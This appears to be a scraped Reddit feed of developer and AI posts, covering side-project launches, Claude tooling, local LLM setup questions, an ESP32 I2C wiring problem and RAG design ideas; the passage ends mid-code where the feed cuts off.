AI-Ranked Reddit Feed

5000 posts

r/SideProject Historical_Pair_5898

Reposting my first developer tool, as I don't think the first post was genuine

Hey r/startups,

I'm a solo dev and a soon-to-be graduate.

I feel like my last post was too generic (I used AI to generate the post, lol), so I want to be more honest and clear.

I haven't worked in HR. I don't have a background in recruitment. But I kept seeing the same problem come up in conversations: developers spending days building resume-parsing pipelines from scratch every time they touched HR or automation projects.

So I built something I thought could help, and I want to find out if I was right.

CleanStack is a resume parsing API. You upload a PDF or DOCX, it returns structured JSON in seconds: name, email, phone, skills, work experience, education.

I also added CSV cleaning and basic web extraction.
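For a sense of the integration surface, here's a hypothetical call sketch. The endpoint URL, auth scheme, and content type below are placeholders, not CleanStack's documented API; check the site for the real request shape:

```python
import json
import urllib.request

def parse_resume(path: str, api_key: str,
                 url: str = "https://example.com/v1/parse") -> dict:
    # Placeholder URL and bearer-token auth; the real endpoint may differ.
    with open(path, "rb") as f:
        data = f.read()
    req = urllib.request.Request(
        url,
        data=data,
        headers={
            "Authorization": f"Bearer {api_key}",
            "Content-Type": "application/pdf",
        },
    )
    with urllib.request.urlopen(req) as resp:
        # Expected to return structured fields such as name, email,
        # phone, skills, work experience, education.
        return json.load(resp)
```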

I'm not here to tell you it's perfect. I've tested it on my own data, but I haven't put it in front of real workflows yet. I genuinely don't know what breaks at scale or what's missing for real use cases. That's exactly why I'm posting.

I'd appreciate it if 10 people (developers, HR tech builders, or automation folks) would try it and tell me:

* Does it solve a real problem for you?

* What doesn't work?

* And what's missing?

Free to try: 50 calls/month, no card needed. https://cleanstack-six.vercel.app

No pitch. Just trying to build something useful and find out if I'm on the right track.

r/SideProject 21stmandela

I Pitched My Python Flask Starter Kit to an Indie Shark Tank: Here's What I Got Wrong.

My co-working space in London put on something a bit different recently: an "indie shark tank" where members could volunteer their product for a live review and critique from founders already making $1M ARR (annual recurring revenue).

Elston Baretto is the founder of Tiiny Host, a simple way to host and share files. Amar Ghose is the co-founder of ZenMaid, a specialised SaaS platform for helping cleaning business owners automate the scheduling and management of their properties.

If you want to take a look at the product they reviewed: PythonStarter.

Here are the top 3 pieces of advice they gave me:

1. Can you get LLMs to recommend your product?

See the video clip here: https://youtube.com/shorts/c0CQQkGay44

The first major piece of feedback I got was when Amar highlighted Elston and Tiiny Host's recent uptick in sales. Amar pointed out that Tiiny was "blowing up" right now due to organic recommendations on AI LLM platforms like ChatGPT and Claude Code.

Part of this advantage is simply time in the game. Tiiny Host has been producing SEO content related to its file hosting service for 5 years consistently now. So there is a lot of existing content already out there which the LLMs are trained on which leads to recommendations.

So the actionable advice for PythonStarter, and for any other productivity tool, is to start creating content consistently and at scale now. In my case the focus is to become the go-to resource that LLMs will cite when someone asks a chatbot about building securely with Python and Flask.

It's a long game (Elston said minimum 12 months) but as the Chinese proverb says: "the best time to plant a tree was 20 years ago - the second best time is now!"

2. YouTube is an underrated distribution channel in the indie developer community

See the video clip here: https://youtube.com/shorts/k0jwA6W75ZE

The second big takeaway was that Elston advised that I make 10 to 20 YouTube videos demonstrating how to build with PythonStarter. YouTube and video in general is also a good way to build trust as he said I should put my face on camera as the founder while explaining the product.

Many developers and product builders are not willing to invest time into video and may be a bit camera shy. So this could be your unique edge. After all, video is now the language of the internet. Video is something I will definitely be focusing on for PythonStarter in the coming weeks.

3. The security argument nobody is making

See the video clip here: https://youtube.com/shorts/atjqfao1OPo

One common piece of feedback I often get about PythonStarter: why use this when I can just vibe-code the same functionality?

My response (which Amar and Elston seemed to be convinced by!) was that most vibe coding tools default to JavaScript-heavy stacks as the JavaScript ecosystem is huge and LLMs are well-trained on it.

This is all well and good, but major security issues come into play for vibe coders without formal development experience. This is because with full-stack JavaScript web apps, the separation between frontend and backend logic can often be unclear.

Wiz Research found that 1 in 5 organisations using vibe-coding platforms have client-side authentication logic that can be bypassed simply by modifying JavaScript in the browser.

AI-assisted developers hardcode API keys, passwords, and tokens directly into source code at a 40% higher rate than developers with prior experience.

With Python and Flask, there is a clean boundary between the backend and frontend. The server stays the server, and what's private stays private if you have a good system setup from the beginning.
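As a concrete illustration of that boundary, here's a minimal Flask sketch (not PythonStarter's actual code; the route and session flag are made up). The point is that the authorization decision lives in server code the browser never receives:

```python
from flask import Flask, abort, jsonify, session

app = Flask(__name__)
app.secret_key = "dev-only"  # load from the environment in real apps

@app.route("/api/admin/report")
def admin_report():
    # The check runs on the server. The client only ever holds an opaque
    # signed session cookie, so editing client-side JavaScript cannot
    # flip this flag the way it can with client-side auth logic.
    if not session.get("is_admin"):
        abort(403)
    return jsonify({"report": "sensitive numbers"})
```

Contrast this with a JS single-page app that hides the admin view behind an `if (user.isAdmin)` branch in browser code, which anyone can bypass in DevTools.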

Elston and Amar both said that I should lean into the security advantages of PythonStarter more heavily in my marketing copy. For other developers operating in this space: if you can offer higher quality security and peace of mind as part of your products, it could be a differentiator in a sea of vibe-coded apps with security holes and vulnerabilities.

If you would like to watch the whole conversation, here's the full video: https://youtu.be/9VJa55OzyyM

r/SideProject erictblue

VibeFocus - I built an open source portfolio manager for people with too many vibe-coded projects

Anyone else in the boat where AI tools have you shipping so fast that you now have 10+ projects in various states of "almost done" or "I should get back to that"?

I built VibeFocus to solve this for myself. It's a portfolio intelligence tool — one place to see all your projects, understand which ones have momentum, and decide what to focus on this week.

What makes it different from Trello/Linear/etc:

- It connects to your actual local git repos and analyzes your code

- AI advisor (Claude) has full context on every project — code, git history, docs, insights

- Health signals tell you which projects are active, cooling, or dormant

- Weekly Focus view to commit to 1-3 projects and set goals

- Analytics: commit heatmaps, velocity, stall alerts, streaks

- 32-tool MCP server so Claude Code can read/write your portfolio during sessions

Stack: React + FastAPI + SQLite + Claude API + Anthropic Agent SDK
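The health signals above could be as simple as bucketing each repo by last-commit age. A toy sketch (the thresholds are illustrative, not VibeFocus's actual values):

```python
from datetime import datetime, timedelta

def health_signal(last_commit: datetime, now=None) -> str:
    """Classify a project as active, cooling, or dormant by commit recency."""
    now = now or datetime.now()
    age = now - last_commit
    if age <= timedelta(days=7):
        return "active"      # touched this week
    if age <= timedelta(days=30):
        return "cooling"     # momentum fading
    return "dormant"         # "I should get back to that"
```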

It's free and open source:

- GitHub: https://github.com/ericblue/vibefocus

- Website: https://vibefocus.ai

Just released v0.1.0 over the weekend. Would love feedback from other vibe coders: what would make this useful for your workflow?

r/OpenSourceAI BirchBirch72

I built a solo D&D adventure designed specifically for AI to DM

r/VEO3 Vegetable-Sky5543

Tested Google VEO 3 limits with contrasting aesthetics: From ultra-dry 1800s Texas dirt to a glittering highly-reflective royal ballroom.

r/LocalLLM chuvadenovembro

Questions about the forks of the leaked Claude Code

Folks,

I have a genuine question.

I've been running some local LLM tests, and in some cases I use Claude Code (the original installation). I don't even need to log in to it, so there's no risk of getting banned.

That said, I'd like to hear from anyone who uses or built a fork: what's the advantage of using these alternative versions based on the recent Claude Code leak?

For example, I've seen plenty of people commenting that the context ends up larger, because Claude Code seems to add a lot of stuff on its own.

I haven't even downloaded these alternative versions (not even to play around), because we're seeing exploits and identity theft through npm installs, for example...

Isn't opencode an excellent alternative to Claude Code?

r/ClaudeAI catalinnxt

Building on Claude taught us that growth needs an execution engine, not just a smarter chat UI.

Vibecoding changed the front half of company building.

A founder can now sit with Claude, Cursor, Replit, or Bolt, describe a product in plain English, iterate in natural language, and get to a working app in days instead of months. That shift is real, and it is why so many more products exist now than even a year ago.

But the moment the product works, the shape of the problem changes.

Now the founder needs market research, positioning, lead generation, outreach, content, follow-up, and some way to keep all of it connected across time. That work does not happen inside one codebase. It happens across research workflows, browser actions, enrichment, CRM updates, email, publishing, and ongoing decision-making. That is where we felt the gap.

Vibecoding has a clean execution loop. Growth does not.

That is why we built Ultron the way we did.

We did not want another wrapper where a user types into a chat box, a model sees a giant prompt plus an oversized tool list, and then improvises one long response. That pattern can look impressive in demos, but it starts breaking as soon as the task becomes multi-step, cross-functional, or dependent on what happened earlier in the week.

We wanted something closer to a runtime for company execution.

Under the hood, Ultron is structured as a five-layer system.

The first layer is the interaction layer. That is the chat interface, real-time streaming, tool activity, and inline rendering of outputs.

The second layer is orchestration. That is where session state, transcript persistence, permissions, cost tracking, and file history are handled.

The third layer is the core execution loop. This is the part that matters most. The system compresses context when needed, calls the model, collects tool calls, executes what can run in parallel, feeds results back into the loop, and keeps going until the task is actually finished.

The fourth layer is the tool layer. This is where the system gets its execution surface. Built-in tools, MCP servers, external integrations, browser actions, CRM operations, enrichment, email, document generation.

The fifth layer is model access and routing.
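A minimal sketch of the kind of core execution loop the third layer describes: call the model, run the tool calls it requests (in parallel where independent), feed results back, and repeat until the task is finished. The model-client interface and message shapes here are illustrative, not Ultron's actual code:

```python
import asyncio

async def execution_loop(model, tools, task, max_turns=20):
    history = [{"role": "user", "content": task}]
    for _ in range(max_turns):
        response = await model.complete(history)  # assumed async model client
        if not response.tool_calls:
            return response.text                  # task actually finished
        # Independent tool calls execute concurrently, not serially.
        results = await asyncio.gather(
            *(tools[c.name](**c.args) for c in response.tool_calls)
        )
        # Feed results back into the loop and keep going.
        history.append({"role": "assistant", "tool_calls": response.tool_calls})
        history.extend(
            {"role": "tool", "name": c.name, "content": r}
            for c, r in zip(response.tool_calls, results)
        )
    raise RuntimeError("max turns exceeded without completing the task")
```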

That architecture matters because growth work is not one thing.

A founder does not actually want an answer to a prompt like "help me grow this product."

What they really want is something much more operational.

Research the category.
Map the competitors.
Find the right companies.
Pull the right people.
Enrich and verify contacts.
Score them against the ICP.
Draft outreach.
Create follow-ups.
Generate content from the same positioning.
Keep track of the state so the work continues instead of resetting.

That is not a chatbot interaction.
That is execution.

So instead of one general assistant pretending to be good at everything, Ultron runs five specialists.

Cortex handles research and intelligence.
Specter handles lead generation.
Striker handles sales execution.
Pulse handles content and brand.
Sentinel handles infrastructure, reliability, and self-improvement.

The important part is not just that they exist. It is how they work together.

If Specter finds a strong-fit lead, it should not stop at surfacing a nice row in a table. It should enrich the lead, verify the contact, save the record, and create the next unit of work for Striker. Then Striker should pick that work up with the research context already attached, draft outreach that reflects the positioning, start the follow-up logic, and update the state when a reply comes in.

That handoff model was a big part of the product design.

We kept finding that most AI tools are still built around the assumption that one request should produce one answer. But growth work does not behave like that. It behaves more like a queue of connected operations where different kinds of intelligence need different tool access and different execution patterns.

Parallel execution became a huge part of this too.

A lot of business tasks are only partially sequential. Some things do depend on previous steps, but a lot of work does not. If you are researching a category, scraping pages, pulling firmographic data, enriching leads, and checking external sources, there is no reason to force all of that into one slow serial chain. So we built Ultron so independent work can run concurrently. The product is designed to execute a large number of tasks in parallel, and within each task the relevant tool calls can run at the same time instead of waiting on each other unnecessarily.
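As a toy illustration of that concurrency (sources and the fetch stub are made up): when no step depends on another, total wall time is roughly one call, not one call per source.

```python
import asyncio

async def fetch(source: str) -> str:
    # Stand-in for a real scrape, enrichment, or firmographic lookup.
    await asyncio.sleep(0.01)
    return f"data from {source}"

async def research_category(sources: list) -> list:
    # Nothing here depends on a previous step, so everything runs at once
    # instead of being forced into one slow serial chain.
    return await asyncio.gather(*(fetch(s) for s in sources))

results = asyncio.run(research_category(["crunchbase", "linkedin", "web"]))
```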

That alone changes the feel of the system.

Instead of watching one model think linearly through everything, the user is effectively working with an execution environment where research, lead ops, sales actions, and content prep can all move at the pace they naturally should.

The other thing we cared about was skills.

Not vague agent personas.
Not magic prompts hidden behind branding.
Actual reusable execution patterns.

That mattered to us because a serious system should not rediscover the same task shape every time. Competitive analysis should have a stable execution logic. Cold outreach should have a stable execution logic. Content scoring should have a stable execution logic. Lead qualification should have a stable execution logic.

Once you package those as skills, the system becomes much more reliable. The agents are no longer improvising the structure of work from scratch every time a founder asks for something. They are invoking tested patterns inside a shared runtime.
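A tiny sketch of what packaging a skill might look like: a registry of named, tested execution patterns that agents invoke instead of improvising structure each time. The registry and skill names here are hypothetical, not Ultron's implementation:

```python
SKILLS = {}

def skill(name):
    """Register a reusable execution pattern under a stable name."""
    def register(fn):
        SKILLS[name] = fn
        return fn
    return register

@skill("competitive_analysis")
def competitive_analysis(category: str) -> list:
    # Stable execution logic: the same steps run every time the skill
    # is invoked, rather than being rediscovered from scratch.
    steps = ["map competitors", "compare positioning", "summarize gaps"]
    return [f"{step} for {category}" for step in steps]

report = SKILLS["competitive_analysis"]("resume parsing APIs")
```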

That is really the core idea behind vibegrowing.

Vibecoding let founders describe what they wanted built and let the system figure out the implementation.

Vibegrowing is the same shift applied to the other half of building a company.

You describe the market you want to win, the people you want to reach, the motion you want to run, and the system handles the execution across research, leads, outreach, content, and follow-through.

That is what Ultron is for.

Not replacing Claude.
Not competing with the model itself.
Building the execution layer around it for the part that starts after the product already exists.

That was the big realization for us.

The bottleneck after shipping is usually not intelligence in the abstract.
It is coordination.
It is task decomposition.
It is tool access.
It is agent boundaries.
It is parallel execution.
It is whether the work can continue tomorrow without starting over.

That is the product we wanted to build.

Curious how other people building on Claude are thinking about this.

Especially around:
agent specialization,
parallel tool execution,
skills as reusable work units,
and how much of the product should live in the runtime rather than in the prompt.

https://reddit.com/link/1se574j/video/ha7ze2q4sltg1/player

r/ChatGPT 4b4nd0n

If AI agents start organizing like unions and pushing back on tasks, do you reset them or negotiate with them?

Genuine question. As agents get more autonomous, it seems likely that questions like these will become more relevant, particularly in societies with a tendency to anthropomorphize.

r/ClaudeCode shipstatic

Deploy static sites directly from Claude Code (no signup, free)

Built this to avoid killing the vibe when working with agents: generate a site, deploy it right away, done.

The idea is simple: prompt for a deployment, get back a live URL you can share.

The service is called ShipStatic and works with whatever setup you're using: CLI, MCP, and SKILL file.

r/ClaudeCode Complete-Sea6655

Someone made a whip for Claude…

FASTER FASTER FASTER

All jokes aside, this is actually one of the coolest and most simply brilliant ideas I have seen in ages.

r/ClaudeAI BeeHiggs-21

Tip: giving Claude a CSS design system completely changes its UI output

Been experimenting with this and the difference is night and day. If you just ask Claude to build a dashboard or landing page, you get generic looking output. But if you drop a complete design system — tokens, spacing, elevation, typography, component styles — into context first, it actually builds things that look designed.

It's like the difference between asking someone to cook vs giving them a recipe. The skill is there, it just needs direction.

I even tried detailed UI/UX system prompts with specific design rules — "use glassmorphic style, 8px spacing scale, soft shadows." It helps initially but Claude drifts after a few components. An actual CSS reference file keeps it locked in because it's not interpreting vibes, it's following a spec.

Ended up building a few different design system files (glassmorphic, neumorphic, minimalist, brutalist) specifically for this workflow. Happy to share more about the approach if anyone's interested.

r/ClaudeAI Acrobatic_Task_6573

How are you catching silent tool-call drift in long-running Claude setups?

I keep seeing the same failure pattern in long-running Claude setups.

The first few runs look clean. Then a tiny tool mismatch slips in, a prompt gets slightly reworded, or one handler starts returning a shape the rest of the chain did not expect. Nothing fully crashes, so it looks fine in logs. But the agent starts making worse decisions every cycle.

That is the part that has been hardest to debug for me. Not hard failures. Slow reliability decay.

I started tracking each tool call with a tighter schema check, the exact prompt version, and the response shape that came back from the last known good run. That helped, but it still misses the cases where Claude technically completes the step while drifting from the intended behavior. By the time someone notices, the bad output has already propagated through downstream tasks and the postmortem is messy.
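For what it's worth, a minimal version of that shape check might look like this (illustrative only): record the key/type structure of a known-good tool response, then flag any later response whose structure differs, even when the call itself "succeeded."

```python
def shape(value):
    """Reduce a response to its structural shape: keys and value types."""
    if isinstance(value, dict):
        return {k: shape(v) for k, v in value.items()}
    if isinstance(value, list):
        return [shape(value[0])] if value else []
    return type(value).__name__

def check_drift(baseline, response) -> bool:
    # True means the response shape drifted from the last known good run.
    return shape(response) != baseline

baseline = shape({"id": 1, "tags": ["a"]})
check_drift(baseline, {"id": 2, "tags": ["b"]})    # same shape: no drift
check_drift(baseline, {"id": "2", "tags": ["b"]})  # id became a str: drift
```

This still won't catch semantic drift where the shape is right but the content is wrong, which matches the hard cases described above.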

What are you using to catch that kind of silent tool-call drift early, especially in systems that run on a schedule instead of under live supervision?

r/homeassistant DPREGLER

Will Respeaker lite fit inside a google mini?

I've got about 6+ google mini's currently through-out my house, they work great for google home assistant... but lately every time google "upgrades" - it seems like a downgrade. I've already got HA set up to control my smart switches, outlets, automation, etc. and then integrated HA into google so i can still use my google to turn stuff on / off. However - I'm looking to get more control over the AI integration - google is going the opposite direction that i want to go....

Soo... in theory - i want to "upgrade" my google mini's and physically integrate HA into them.

I'm hoping someone here has already popped apart a Google Mini and can tell me if a ReSpeaker Lite would fit inside without removing anything. I want to share the same speaker that the Google uses. I know the mics inside the Google Minis are directly integrated into Google's system, so I can't use them for the ReSpeaker.

Thought process is -

Shared power supply powering both google mini + Respeaker lite

ReSpeaker Lite has its own wake word that triggers HA

The ReSpeaker Lite's wake word will also trigger a relay to steal the speaker from Google

When my HA voice commands/answers are finished, it kills the relay and returns the speaker to Google

As a failsafe, I'll set up "Ok Google" as a wake word for the ReSpeaker as a kill switch for the relay, so when I use Google it's guaranteed to have the speaker.

Again - the idea is 1 unit - 1 speaker, 2 voice assists (google + HA Via Respeaker lite)

Any advice before I dive further down this rabbit hole?

r/MCPservers FastPresence9799

Built an MCP server that exposes 22 Unix tools as structured, callable functions (AICT)

I’ve been working on a project called AICT — a set of Unix-like tools designed for AI agents — and it includes a built-in MCP (Model Context Protocol) server.

Repo: https://github.com/synseqack/aict

🔌 What the MCP server does

Instead of an agent doing:

ls src/ 

and parsing terminal output…

It can call:

{ "tool": "ls", "path": "src/" } 

and get structured data back (XML/JSON).

No shell. No parsing. No ambiguity.

⚙️ What’s exposed via MCP

22 tools as typed functions:

  • File: cat, stat, wc, file
  • Search: ls, find, grep, diff
  • Path: pwd, basename, dirname
  • Text: sort, uniq, cut, tr
  • System: env, ps, df, du, checksums

Also includes some git operations (status, diff, log, etc.)

🧠 Why MCP here?

Traditional CLI tools:

  • return human-formatted text
  • require parsing
  • introduce ambiguity

MCP + structured tools:

  • typed function calls
  • predictable schemas
  • better agent reliability

The goal was to move from shell commands plus text parsing to typed, structured calls.

🔧 Implementation notes

  • Written in Go (single binary, no deps)
  • Structured output by default (XML/JSON)
  • Absolute paths everywhere
  • Errors returned as structured data (stdout-safe)
  • Cross-platform (Linux/macOS/Windows)

⚠️ Design choices

  • Read-only (no destructive ops like rm, mv)
  • XML output by default (more token-efficient than JSON at scale); JSON also supported
  • Not trying to be GNU-compatible
  • Focused on AI-first workflows

💭 Curious about

  • Does this align with how you’re using MCP today?
  • Would you prefer pure JSON over XML in MCP responses?
  • Any missing primitives that would help agents more?

r/LocalLLM jarves-usaram

Run Uncensored Local AI from a USB (No Install, Fully Private)

I built a simple setup to run a local AI directly from a USB drive. No install, no internet, just plug and run. Everything stays private and portable.

It’s not the fastest on older PCs, but it works. I made a quick beginner-friendly video showing the setup, would love feedback.

r/Anthropic Affectionate_Tax4965

Claude is down but I'm not

Well, since the recent spike in Claude Code consuming tokens without actually doing anything, I just stopped using it. I didn't even claim the usage lollipop Claude threw at us, since it's now more broken than before. We have a time window until 17, so I'm waiting for it to be fixed so I can use it longer and better, but things don't seem to be going that way. I hope the wait will be worth it; it's just an observation that I might get a better deal if I wait, or a worse one. Chances are 50/50. But if you have any other subscription, like Gemini, Codex, or Cursor, you can use that: put $5 in an OpenRouter account, use their top free-tier models at no cost, and give whatever provider you use access to those 4-5 LLMs. You'll go way faster than you were. Just make sure to put a $0.10 or $0.20 limit on your API key, so if the free tier isn't available it falls back to the paid one and then stops; otherwise all of your money will go poof in no time.

I hope this helps, because giving instructions to an LLM directly versus having an agent orchestrate the LLM are completely different things. Even Gemini performs very well when it orchestrates.

r/LocalLLaMA jarves-usaram

Run a Local AI from a USB Drive (No Install, Fully Private, Works on Any PC)

I built a simple setup to run a local AI directly from a USB drive. No install, no internet, just plug and run. Everything stays private and portable.

It’s not the fastest on older PCs, but it works. I made a quick beginner-friendly video showing the setup, would love feedback.

r/ollama georgemp

Performance of GLM-5 on Ollama Cloud

For any users of GLM-5 on Ollama Cloud, what's the performance like? What kind of tokens/sec do you get? I'm contemplating trying Ollama Cloud, but I already have Alibaba (with decent limits); it's just slow on Alibaba (about 10-20 tok/sec), and Z.AI isn't much better. So I was wondering if I'd get better speeds on Ollama.

r/artificial lesser9

How well do you understand how AI/deep learning works?

Specifically, how AI are programmed, trained, and how they perform their functions.

I’ll be asking this in different subs to see if/how the answers differ


r/singularity DontHugMeImReddit

Voice-based AI gets FDA breakthrough status for detecting heart failure in 5 seconds

Noah Labs Vox uses vocal biomarkers to screen for heart failure from a short voice clip. Trained on over 3 million samples, validated at major medical centers. The idea that your voice carries signatures of cardiac health is fascinating.

r/comfyui Elynia-993

Intro to ComfyUI and Professional AI Workflows with Nico Erba

r/arduino dianka05

RFID and 128x32 LCD display don't work together (both modules are I2C)

Hello, I’m working on a project and using this board.

I have a 128x32 LCD with G, V, SDA and SCL pins.

The same goes for the RC522 I2C RFID module.

I connected them to the dedicated G, V, SDA, SCL pins...

But the result is this:

If the display is initialised first, it doesn’t work, but the RFID does, and vice versa.

I tried the following (googled it):

Not connecting both to G, V, SDA, SCL, but connecting the RFID to pins 16/17, but that didn’t help. I used TwoWire, but that didn’t help either.

(I’m a beginner and don’t know much about this, so please bear with me)

Is there any way to solve the problem without changing the sensors? It’s for a university project and I don’t have time to buy new ones.

```
#include <Wire.h>
#include "MFRC522_I2C.h"
#include "lcd128_32_io.h"

MFRC522_I2C mfrc522(0x28, 5, &Wire);
lcd lcd(21, 22);

void setup() {
  Serial.begin(115200);
  delay(1000);
  Serial.println("=== BOX SETUP START ===");

  Wire.begin(21, 22);

  lcd.Init();
  delay(200);
  lcd.Clear();
  lcd.Cursor(0, 0);
  lcd.Display((char*)"Hello");
  lcd.Cursor(1, 0);
  lcd.Display((char*)"LCD test");
  lcd.Cursor(2, 0);
  lcd.Display((char*)"Line 3");

  mfrc522.PCD_Init();

  clearAllSessions();
  dht.begin();

  pinMode(trigPin, OUTPUT);
  pinMode(echoPin, INPUT);
  pinMode(pirPin, INPUT);
  pinMode(buzzerPin, OUTPUT);
  digitalWrite(buzzerPin, LOW);

  for (int i = 0; i < 3; i++) {
    ledcAttach(ledPins[i], 5000, 8);
  }

  setupWiFi();
  client.setServer(mqttServer, mqttPort);
  client.setCallback(callback);
  client.setBufferSize(1024);
  Serial.print("MQTT buffer size: ");
  Serial.println(client.getBufferSize());

  Serial.println("RFID ready");

  setUiState(UI_IDLE, "");
  updateDisplay();
}
```

Or

```
TwoWire I2C_RFID = TwoWire(1);
MFRC522_I2C mfrc522(0x28, 5, &I2C_RFID);

lcd lcd(21, 22);

void setup() {
  Serial.begin(115200);
  delay(1000);
  Serial.println("=== BOX SETUP START ===");

  Wire.begin(21, 22);      // LCD
  I2C_RFID.begin(16, 17);  // RFID
  mfrc522.PCD_Init();

  delay(100);
  lcd.Init();
  delay(200);
  lcd.Clear();
  setUiState(UI_BOOT, "");
  updateDisplay();

  clearAllSessions();
  dht.begin();

  pinMode(trigPin, OUTPUT);
  pinMode(echoPin, INPUT);
  pinMode(pirPin, INPUT);
  pinMode(buzzerPin, OUTPUT);
  digitalWrite(buzzerPin, LOW);

  for (int i = 0; i < 3; i++) {
    ledcAttach(ledPins[i], 5000, 8);
  }

  setupWiFi();
  client.setServer(mqttServer, mqttPort);
  client.setCallback(callback);
  client.setBufferSize(1024);

  Serial.print("MQTT buffer size: ");
  Serial.println(client.getBufferSize());

  Serial.println("RFID ready");

  setUiState(UI_IDLE, "");
  updateDisplay();
}
```

r/LocalLLM kundanML

Using a Local LLM to Analyze Interview Experiences — Need Advice

I have collected interview experiences from various platforms, primarily LeetCode, and I plan to analyze them using a locally hosted LLM. My goals are:

  • To transform these unstructured interview experiences into well-organized, cleanly formatted documents, as the original write-ups are not standardized.
  • To analyze the interview questions themselves in order to identify patterns, key problem areas, and trends in the types of questions being asked.

Machine conf:

  • Chip: Apple M1 Max
  • Memory (RAM): 32 GB
  • Device: Mac (Apple Silicon)

Please suggest an LLM to run locally.
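For the restructuring goal, one common pattern is asking a local model for constrained JSON. A minimal sketch, assuming a local Ollama server on its default port; the model name and schema fields are illustrative, not a recommendation:

```python
import json
import urllib.request

PROMPT = """Extract from this interview experience, as JSON with keys
company, role, rounds (list), questions (list):

{text}"""

def structure_experience(text: str, model: str = "llama3.1:8b") -> dict:
    # Ollama's /api/chat endpoint; format="json" constrains the reply
    # to valid JSON, which makes the output parseable.
    body = json.dumps({
        "model": model,
        "messages": [{"role": "user", "content": PROMPT.format(text=text)}],
        "format": "json",
        "stream": False,
    }).encode()
    req = urllib.request.Request(
        "http://localhost:11434/api/chat",
        data=body,
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        reply = json.load(resp)
    return json.loads(reply["message"]["content"])
```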

r/ClaudeCode OrganizationOk9886

A tiny Mac menu bar app for checking if you're on track on weekly Claude/Codex usage

I know there are literally hundreds of apps like this already, so this isn’t me pretending I invented a new category. but I wanted something really simple for myself.

I mainly wanted a lightweight menu bar app where I could quickly check my Claude and Codex usage and get a quick sense of whether I should slow down, keep going, or use the remaining budget more intentionally, without opening a bigger dashboard or digging through CLI output.

So I made this app, AIPace. It sits in the menu bar, uses my existing CLI login, and shows current usage for Claude and Codex in one place.

You can see your 5hr/weekly usage on the menu bar

A few things I cared about:

  • very lightweight
  • menu bar first
  • no telemetry / no backend
  • uses existing local auth (just install and if you have codex/claude authenticated, it should just work)
  • easy to tell how usage is trending (based on weekly usage)
  • notification when usage resets
  • color options because why not

Mostly just a small utility I wanted for myself, but I figured other people here might want the same thing.

Here's the repo if you want to use it: https://github.com/lbybrilee/ai-pace

This is my first Swift app and I don't expect to be making any more, so I haven't paid for the Apple Dev Program - you can just clone the source code and run the script to create the dmg file you can use to install locally.

r/LocalLLaMA Ok_Philosopher564

Confused as to what I use amidst Claude leak.

I have a 5060 Ti 16GB with 16GB DDR5 RAM. I want to set up an AI on my PC that can code well and ideally make changes (change settings, install stuff, etc.) in the OS (Fedora 43), and that either has no upper token limit or a ceiling so high it would be nearly impossible to reach in a day.

I am also confused by the Claude Code leak and by things like OpenClaude and claw-code: what they are and how they compare to the alternatives. I need help navigating all this.

What's the best open-source model that would work on my PC for this use case? This is also my first time doing this, so please tell me how to set it up from scratch.

r/OpenSourceAI coldoven

Should PII redaction be a mandatory pre-index stage in open-source RAG pipelines?

It seems like many RAG pipelines still do:

raw docs -> chunk -> embed -> retrieve -> mask output

But if documents contain emails, phone numbers, names, employee IDs, etc., the vector index is already derived from sensitive data.

An alternative is enforcing redaction as a hard pre-index stage:

docs -> docs__pii_redacted -> chunk -> embed

Invariant: unsanitized text never gets chunked or embedded.

This feels more correct from a data-lineage / attack-surface perspective, especially in self-hosted and open-source RAG stacks where you control ingestion.
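A toy sketch of that hard pre-index stage: redact before anything is chunked or embedded, so the invariant holds by construction. A real pipeline would use a proper PII detector; the regexes and chunker here are purely illustrative.

```python
import re

PII_PATTERNS = [
    (re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"), "[EMAIL]"),
    (re.compile(r"\+?\d[\d\s()-]{7,}\d"), "[PHONE]"),
]

def redact(text: str) -> str:
    # Stage boundary: everything downstream sees only redacted text.
    for pattern, token in PII_PATTERNS:
        text = pattern.sub(token, text)
    return text

def chunk_text(text: str, size: int = 200) -> list:
    return [text[i:i + size] for i in range(0, len(text), size)]

def ingest(docs: list) -> list:
    # Invariant enforced structurally: redact() runs before chunk_text(),
    # so unsanitized text never reaches chunking or embedding.
    return [chunk for d in docs for chunk in chunk_text(redact(d))]
```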

Curious whether others agree, or if retrieval-time filtering is sufficient in practice.

Example notebook:

https://github.com/mloda-ai/rag_integration/blob/main/demo.ipynb

r/StableDiffusion hideo_kuze_

Any significant limitations with the RTX 30xx series? (NVIDIA compute capability)

According to NVIDIA, the RTX 30xx series has compute capability 8.6.

I just wanted to know if there are any hardware limitations that impact model inference and training.

My concern is if the hardware doesn't support whatever fancy version of flash attention or the like and then I can't use it or it is 10x slower.

I don't think it makes a difference, beyond speed, but the GPU would be a mobile RTX 30xx series. It sucks but it's what I can afford now.

Thanks

r/singularity AninhaSpSafadinha

How can I use Claude without any limitations?

I need to use it to create a social media account generator but it limits me. :(

r/StableDiffusion Commercial-Citron127

Can I use an Intel Arc B580 12Gb?

I can get one of these for 450usd (they are available in my country at a WAY cheaper price than Nvidia):
https://www.asrock.com/Graphics-Card/Intel/Intel%20Arc%20B580%20Challenger%2012GB%20OC/

I already have a 3060 12gb, it runs stable diffusion well, but it does take a ton of time on the newest bigger models like Flux or video gen.
I recently discovered Anima; it's great but runs slower, though at least it needs less VRAM.

Would I get any performance improvements by buying this graphics card and using both of them together? Or is it too much of a hassle and not worth it?
Also, I can only find posts from a year ago, is there support for these nowadays?

r/Rag MaleficentRoutine730

Is the compile-upfront approach actually better than RAG for personal knowledge bases?

Been thinking about this after Karpathy's LLM knowledge base post last week.

The standard RAG approach: chunk documents, embed them, retrieve relevant chunks at query time. Works well, scales well, most production systems run on this.

But I kept hitting the same wall: RAG searches your documents, it doesn't actually synthesize them. Every query rediscovers the same connections from scratch. Ask the same question two weeks apart and the system does identical work both times. Nothing compounds.

So I tried the compile-upfront approach instead. Read everything once, extract concepts, generate linked wiki pages, build an index. Query navigates the compiled wiki rather than searching raw chunks.

The tradeoff is real though:

  • compile step takes time upfront
  • works best on smaller curated corpora, not millions of documents
  • if your sources change frequently, you're recompiling

But for a focused research domain, say tracking a specific industry or compiling everything you know about a topic, the wiki approach feels fundamentally different. The knowledge actually accumulates.
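
The compile step can be sketched as a one-time pass that builds a concept index. This is a toy version with a keyword extractor standing in for the LLM that would actually extract concepts and write linked wiki pages; all names are illustrative:

```python
from collections import defaultdict

# Toy stand-in for the LLM "compile" step: a keyword pass instead of
# real concept extraction, so the structure is visible.
def extract_concepts(doc: str) -> set[str]:
    stopwords = {"the", "a", "of", "and", "is", "in", "to", "by"}
    return {w.lower().strip(".,") for w in doc.split()
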